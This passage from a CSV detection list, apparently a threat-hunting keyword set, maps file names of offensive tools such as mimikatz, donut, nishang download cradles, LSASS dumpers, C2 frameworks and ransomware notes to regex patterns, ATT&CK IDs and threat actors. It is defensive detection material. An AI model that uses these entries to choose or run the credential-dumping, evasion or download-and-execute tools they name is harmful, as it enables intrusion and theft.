T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","15031" "*\Dont Press.exe*",".{0,1000}\\Dont\sPress\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15032" "*\donut.exe*",".{0,1000}\\donut\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","15033" "*\donut\VanillaProgram.bin*",".{0,1000}\\donut\\VanillaProgram\.bin.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","15034" "*\donut-packer.py*",".{0,1000}\\donut\-packer\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","15035" "*\doppelpaymer1.txt*",".{0,1000}\\doppelpaymer1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15036" "*\doppelpaymer2.txt*",".{0,1000}\\doppelpaymer2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom 
notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15037" "*\doppelpaymer3.txt*",".{0,1000}\\doppelpaymer3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15038" "*\doppelpaymer4.txt*",".{0,1000}\\doppelpaymer4\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15039" "*\Doraemon*",".{0,1000}\\Doraemon.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","15040" "*\DosDevices\mimidrv*",".{0,1000}\\DosDevices\\mimidrv.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz 
strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","15041" "*\DoubleDrive-main.zip*",".{0,1000}\\DoubleDrive\-main\.zip.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","15042" "*\doucme.csproj*",".{0,1000}\\doucme\.csproj.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","15043" 
"*\doucme.exe*",".{0,1000}\\doucme\.exe.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","15044" "*\doucme.sln*",".{0,1000}\\doucme\.sln.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","15045" "*\Download:Cradle.js*",".{0,1000}\\Download\:Cradle\.js.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","15046" "*\Download_Cradles.hta*",".{0,1000}\\Download_Cradles\.hta.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","15048" "*\Download_Cradles.ps1*",".{0,1000}\\Download_Cradles\.ps1.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","15049" "*\Download_Execute.ps1*",".{0,1000}\\Download_Execute\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15050" "*\Download_Execute_PS.ps1*",".{0,1000}\\Download_Execute_PS\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15051" "*\download_filehttp.py*",".{0,1000}\\download_filehttp\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15052" "*\download_filehttp.txt*",".{0,1000}\\download_filehttp\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that 
allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15053" "*\Download-Cradles.cmd*",".{0,1000}\\Download\-Cradles\.cmd.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","15054" "*\downloadexec.lua*",".{0,1000}\\downloadexec\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","15055" "*\Download-Execute-PS.ps1*",".{0,1000}\\Download\-Execute\-PS\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15056" "*\Dpapi.ps1*",".{0,1000}\\Dpapi\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","15058" "*\dpapi.py*",".{0,1000}\\dpapi\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15059" "*\dpat.py*",".{0,1000}\\dpat\.py.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","N/A","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","15060" "*\DragonCastle.dll*",".{0,1000}\\DragonCastle\.dll.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","15061" "*\DragonCastle.pdb*",".{0,1000}\\DragonCastle\.pdb.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","15062" 
"*\DragonCastle-master\*",".{0,1000}\\DragonCastle\-master\\.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","15063" "*\D-RAT.exe*",".{0,1000}\\D\-RAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15064" "*\DReverseClint.go*",".{0,1000}\\DReverseClint\.go.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","15066" "*\DReverseServer.go*",".{0,1000}\\DReverseServer\.go.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","15067" "*\DriverDump.c*",".{0,1000}\\DriverDump\.c.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15069" "*\DriverDump.exe*",".{0,1000}\\DriverDump\.exe.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15070" "*\DriverDump.sln*",".{0,1000}\\DriverDump\.sln.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15071" "*\DriverDump.vcxproj*",".{0,1000}\\DriverDump\.vcxproj.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15072" "*\dropper\dropit.py*",".{0,1000}\\dropper\\dropit\.py.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","15074" 
"*\dropper\dropper.vba*",".{0,1000}\\dropper\\dropper\.vba.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","15075" "*\drop-sc.py*",".{0,1000}\\drop\-sc\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15076" "*\DRSAT.exe*",".{0,1000}\\DRSAT\.exe.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. 
attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","15077" "*\DRSAT-0.2.zip*",".{0,1000}\\DRSAT\-0\.2\.zip.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","15078" "*\DSInternals.psd1*",".{0,1000}\\DSInternals\.psd1.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","15079" "*\dt87xz\Defender_Settings.vbs*",".{0,1000}\\dt87xz\\Defender_Settings\.vbs.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense 
Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15080" "*\DtMXQFOCos-RECOVER-README.txt*",".{0,1000}\\DtMXQFOCos\-RECOVER\-README\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15081" "*\dual_mine_etc_aleph_herominer.bat*",".{0,1000}\\dual_mine_etc_aleph_herominer\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15082" "*\dual_mine_etc_aleph_lhr_admin.bat*",".{0,1000}\\dual_mine_etc_aleph_lhr_admin\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15083" "*\dual_mine_etc_aleph_woolypooly.bat*",".{0,1000}\\dual_mine_etc_aleph_woolypooly\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15084" "*\dual_mine_ethw_aleph_herominer.bat*",".{0,1000}\\dual_mine_ethw_aleph_herominer\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15085" 
"*\dual_mine_ethw_aleph_lhr_admin.bat*",".{0,1000}\\dual_mine_ethw_aleph_lhr_admin\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15086" "*\dual_mine_ethw_aleph_woolypooly.bat*",".{0,1000}\\dual_mine_ethw_aleph_woolypooly\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15087" "*\dual_mine_rth_aleph.bat*",".{0,1000}\\dual_mine_rth_aleph\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15088" "*\dual_mine_rth_kls.bat*",".{0,1000}\\dual_mine_rth_kls\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15089" "*\dual_mine_rth_rxd.bat*",".{0,1000}\\dual_mine_rth_rxd\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","15090" "*\duedlligence.dll*",".{0,1000}\\duedlligence\.dll.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","N/A","10","5","469","89","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z","15096" "*\dump.ps1*",".{0,1000}\\dump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15097" "*\dumpCredStore.ps1*",".{0,1000}\\dumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15098" "*\dumper.ps1*",".{0,1000}\\dumper\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","15099" "*\dumper.ps1*",".{0,1000}\\dumper\.ps1.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","15100" "*\dumper2020_exe*",".{0,1000}\\dumper2020_exe.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all 
